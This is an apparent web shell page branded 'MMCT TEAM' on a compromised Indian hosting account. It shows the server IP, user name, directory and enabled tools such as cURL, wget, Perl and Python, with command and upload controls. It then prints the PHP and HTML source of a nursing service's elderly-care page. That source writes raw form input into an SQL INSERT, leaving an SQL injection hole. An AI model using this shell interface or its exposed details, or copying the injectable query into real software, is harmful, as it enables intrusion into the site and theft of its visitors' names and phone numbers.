MMCT TEAM
Server IP : 103.53.40.154  /  Your IP : 52.15.223.239
Web Server : Apache
System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : ppcad7no ( 715)
PHP Version : 8.2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home2/ppcad7no/joshidiagnosticcentre.com/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/ppcad7no/joshidiagnosticcentre.com/elderly-care.php
<?php
   
   if(isset($_POST['submit'])) 
   { 
   include('admin/config.php');
   
       $name = $_POST['name'];
       $phone = $_POST['phone'];
       $service = $_POST['service'];

        $sql= " INSERT INTO `consultant_page`(`name`, `phone`, `service`) VALUES ('$name','$phone','$service')";
       // echo "<br> <h1>No image</h1>";
   
       $result = mysqli_query($conn, $sql) or die("Query unsuccessful");
       // echo "<br> <h1>No image</h1>";
   
       if($result){
         echo ("<script>
          window.alert('Succesfully Send');
          window.location.href='elderly-care.php';
          </script>");
        
          mysqli_close($conn);
       }else{
       //    
       echo "Not Sybmitted";
       }
    }
?>
<!doctype html>
<html class="" lang="en">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="csrf-token" content="WUr7YPVoFe0ZL5l6zQ5288VBVkEZefds8imN3kOa">

    <title>Elder care services | Care taker for elderly services - Nursing CareO</title>

</head>

<body class="">
    <!-- header  -->
    <?php include "oth-header.php";?>

    <section class="bg-cover py-3 py-md-4 py-lg-5"
        style="background-image: url('images/elderly-care.jpg')">
        <div class="container">
            <div class="row">
                <div class="col-lg-6 col-xl-7 d-flex">
                    <div class="w-100 my-auto">
                        <h1 class="font-alt text-center text-lg-left display-4 mb-3 mb-lg-5">
                            <span class="bg-primary text-white px-3">Elderly Care Services</span>
                            <br>
                        </h1>
                        <div class="bg-black-50 text-white rounded-lg p-4 mb-3 mb-lg-5">
                            <h2 class="text-uppercase"><strong>Taking care of them for you</strong></h2>
                            <p class="lead">Hire trained and certified attendants, give your parents a friendly
                                companion in form of male or female attendant.</p>
                            <p class="lead mb-0">For more information, get a callback and discuss your requirement.</p>
                        </div>
                        <div class="btn-toolbar">
                            <a onclick="gtag_report_conversion();"
                                class="btn btn-secondary btn-lg text-uppercase px-5 py-3" href="tel:7718379866">Call Us</a>
                            <a class="btn btn-light btn-lg text-uppercase ml-2 px-5 py-3" href="contact-us.php"
                                type="button">Enquire</a>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>
    <section class="py-3 py-md-4 py-lg-5">
        <div class="container">
            <div class="row">
                <div class=" col-lg-6  ">
                    <div class="card shadow mb-3 mb-lg-0">
                        <div class="card-body">
                            <p class="card-title h5">
                                <a class="text-secondary">Get in touch with our expert</a>
                            </p>
                            <p class="card-text mb-3 mb-md-4 mb-lg-5"> Get a callback from our executive to talk further about your requirements.</p>
                            <form action="<?php $_PHP_SELF?>" method="post">
                                <input type="hidden" name="service" value="Attendant">
                                <div class="form-group">
                                    <label for="requirement-name">Name <span class="text-danger">&ast;</span></label>
                                    <input class="form-control form-control-lg " id="requirement-name" name="name"
                                        required value="">
                                </div>
                                <div class="form-group">
                                    <label for="requirement-phone">Phone number <span class="text-danger">&ast;</span></label>
                                    <input class="form-control form-control-lg " id="requirement-phone" name="phone" required type="tel" >
                                </div>
                                <input name="service" type="hidden" value="Attendant">
                                <button class="btn btn-secondary btn-lg" name="submit">Submit <i class="fas fa-arrow-right ml-1"></i></button>
                            </form>
                        </div>
                    </div>
                </div>
                <div class="col-lg-6">
                    <div class="mb-3">
                        <div class="card bg-primary text-white">
                            <div class="card-body">
                                <p class="card-title text-uppercase h5"><strong>Friendly and helpful</strong></p>
                                <p class="card-text">Our attendants are certified from renowned institutions and further oriented at our campus before job assignment.</p>
                                <ul class="fa-ul">
                                    <li><span class="fa-li"><i class="fas fa-prescription"></i></span> GDA certified and capable staff.</li>
                                    <li><span class="fa-li"><i class="fas fa-prescription"></i></span> Polite and
                                        friendliness guaranteed.</li>
                                    <li><span class="fa-li"><i class="fas fa-prescription"></i></span> Fully hygienic professionals.</li>
                                </ul>
                                <a class="btn btn-dark btn-lg" href="contact-us.php">Submit a
                                    Requirement <i class="fas fa-arrow-right ml-1"></i></a>
                            </div>
                        </div>
                    </div>
                    <div class="card bg-dark text-white">
                        <div class="card-body">
                            <p class="card-title text-uppercase h5"><strong>Complete elderly care</strong></p>
                            <p class="card-text">Our GDA certified attendants will take care of your beloved just as (if not more than) you would.</p>
                            <ul class="fa-ul">
                                <li><span class="fa-li"><i class="fas fa-prescription"></i></span> Giving meal and
                                    medicines on time.</li>
                                <li><span class="fa-li"><i class="fas fa-prescription"></i></span> Helping with
                                    mobility, toileting and cleaning.</li>
                                <li><span class="fa-li"><i class="fas fa-prescription"></i></span> Ryle's tube feeding, tracheotomy etc.</li>
                            </ul>
                            <a class="btn btn-primary btn-lg" href="contact-us.php">
                                Contact us <i class="fas fa-arrow-right ml-1"></i>
                            </a>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>
    <section class="bg-light py-3 py-md-4 py-lg-5">
        <div class="container">
            <h2 class="text-center">
                <a class="text-primary">Caring them for you</a>
            </h2>
            <p class="text-center mb-3 mb-lg-5">Nursing Careo eases your strain by offering at home service which covers all aspects of elderly care and beyond.</p>
            <div class="row">
                <div class="col-sm-6 col-lg-3">
                    <div class="mb-3 mb-lg-0">
                        <div class="card my-card">
                            <div class="card-body text-center">
                                <p class="card-text">
                                    <img alt="Feeding" src="images/icon-man-eating2a14.webp?id=7e459f30391a9e22cd4b">
                                </p>
                                <h3 class="card-title"><a class="text-secondary">Feeding</a></h3>
                                <p class="card-text">Ensuring on time meals as prescribed.</p>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="col-sm-6 col-lg-3">
                    <div class="mb-3 mb-lg-0">
                        <div class="card my-card">
                            <div class="card-body text-center">
                                <p class="card-text">
                                    <img alt="Medication" src="images/icon-pill0838.webp">
                                </p>
                                <h3 class="card-title"><a class="text-secondary">Medication</a></h3>
                                <p class="card-text">Giving and keeping track of medicines.</p>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="col-sm-6 col-lg-3">
                    <div class="mb-3 mb-sm-0">
                        <div class="card my-card">
                            <div class="card-body text-center">
                                <p class="card-text">
                                    <img alt="Cleaning" src="images/icon-cleaning8a15.webp">
                                </p>
                                <h3 class="card-title"><a class="text-secondary">Cleaning</a></h3>
                                <p class="card-text">Toileting and cleaning of wounds etc.</p>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="col-sm-6 col-lg-3">
                    <div class="card my-card">
                        <div class="card-body text-center">
                            <p class="card-text">
                                <img alt="Mobility" src="images/icon-man-wheelchaireb93.webp">
                            </p>
                            <h3 class="card-title"><a class="text-secondary">Mobility</a></h3>
                            <p class="card-text">Helping with movements and exercises.</p>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>

    <section class="bg-light py-3 py-md-4 py-lg-5">
        <div class="container">
            <div class="row">
                <div class="col-lg-6">
                    <div class="mb-3 mb-lg-0">
                        <img alt="Hire attendants for Elderly Care" class="img-fluid"
                            src="images/banner-elderly-care-2a376.webp">
                    </div>
                </div>
                <div class="col-lg-6">
                    <h3 class="mb-3 mb-lg-4 mb-lg-5">
                        <a class="text-primary">Companion for your parents</a>
                    </h3>
                    <p>In the present time where each two or three man is working it turns into a piece demanding to finish consideration regarding the dearest senior home consideration administrations. You can decide on Nursing Careo's old consideration administration at home and joy them with care they merit.
</p>
                    <p class="mb-3 mb-lg-4 mb-lg-5">Our attendants not simply take care of the senior just at home however they are likewise adaptable in helping the needful to the specialist, facility or any place what is going on requests.</p>
                    <div class="btn-toolbar">
                        <a class="btn btn-primary btn-lg" href="tel:7718379866">
                            <i class="fas fa-phone-alt mr-1"></i> Call Us
                        </a>
                        <a class="btn btn-dark btn-lg ml-2" href="contact-us.php" type="button">
                            Enquire <i class="fas fa-arrow-right ml-1"></i>
                        </a>
                    </div>
                </div>
            </div>
        </div>
    </section>
    <section class="py-3 py-md-4 py-lg-5">
        <div class="container">
            <p class="text-center h3">
                <a class="text-primary">Exceeding expectations</a>
            </p>
            <p class="lead text-center mb-3 mb-lg-4 mb-lg-5">
                Reviewed for excellence and our commitment towards well-being of patients, our clients love us as much as we love them.</p>
            <div id="carousel-testimonials" class="carousel slide" data-ride="carousel">
                <div class="carousel-inner mb-0">
                    <div class="carousel-item mb-0 active">
                        <blockquote class="blockquote bg-light mb-0 p-3 p-md-4 p-xl-5">
                            <p class="mb-2">
                                &ldquo;I have taken services from Nursing Careo. The attendant was hygienic, professional and well groomed. Keep it up Nursing Careo.&rdquo;
                            </p>
                            <footer class="blockquote-footer text-right">
                                <strong>Meenu Verma</strong>
                                <small>rated</small>
                                <i class="fas fa-star text-warning"></i>
                                <i class="fas fa-star text-warning"></i>
                                <i class="fas fa-star text-warning"></i>
                                <i class="fas fa-star text-warning"></i>
                                <i class="fas fa-star text-warning"></i>
                            </footer>
                        </blockquote>
                    </div>
                    <div class="carousel-item">
                        <blockquote class="blockquote bg-light mb-0 p-3 p-md-4 p-xl-5">
                            <p class="mb-2">
                                &ldquo;Took the service of elder care for my grandfather. They are truly a well
                                competent attendants, they really cared and served him well.&rdquo;
                            </p>
                            <footer class="blockquote-footer text-right">
                                <strong>Asjad</strong>
                                <small>rated</small>
                                <i class="fas fa-star text-warning"></i>
                                <i class="fas fa-star text-warning"></i>
                                <i class="fas fa-star text-warning"></i>
                                <i class="fas fa-star text-warning"></i>
                                <i class="fas fa-star text-warning"></i>
                            </footer>
                        </blockquote>
                    </div>
                </div>
            </div>
        </div>
    </section>

    <!-- footer  -->
    <?php include "footer.php";?>

</body>

</html>

MMCT - 2023